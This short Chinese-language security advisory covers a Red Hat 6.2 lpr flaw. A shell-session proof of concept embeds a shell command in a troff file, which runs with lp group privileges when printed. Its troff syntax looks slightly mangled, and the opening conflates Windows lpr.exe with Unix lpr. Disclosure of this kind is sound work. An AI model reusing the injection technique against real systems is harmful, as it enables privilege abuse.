lpr.exe是什么
lpr.exe 用于Unix客户打印机将打印任务发送给连接了打印设备的NT的打印机服务器。
lpr是UNIX的打印工具,在REDHAT 6.2中lpr存在漏洞允许以lp的组身份执行任意
命令。漏洞问题是在处理troff文件,他们转化为postscript时候产生的。当处理
时,嵌在troff文件里面的命令可以被执行,这个导致lpr配置文件破坏。
测试代码
[zen@continuity /tmp]$ cat asdf
PS
sh D/usr/bin/id>/tmp/yougetanyideasyetD
.PF
[zen@continuity /tmp]$ lpr asdf
[zen@continuity /tmp]$ cat /tmp/yougetanyideasyet
uid=500(zen) gid=500(zen) groups=7(lp)
解决方案
暂时关闭lpr程序。
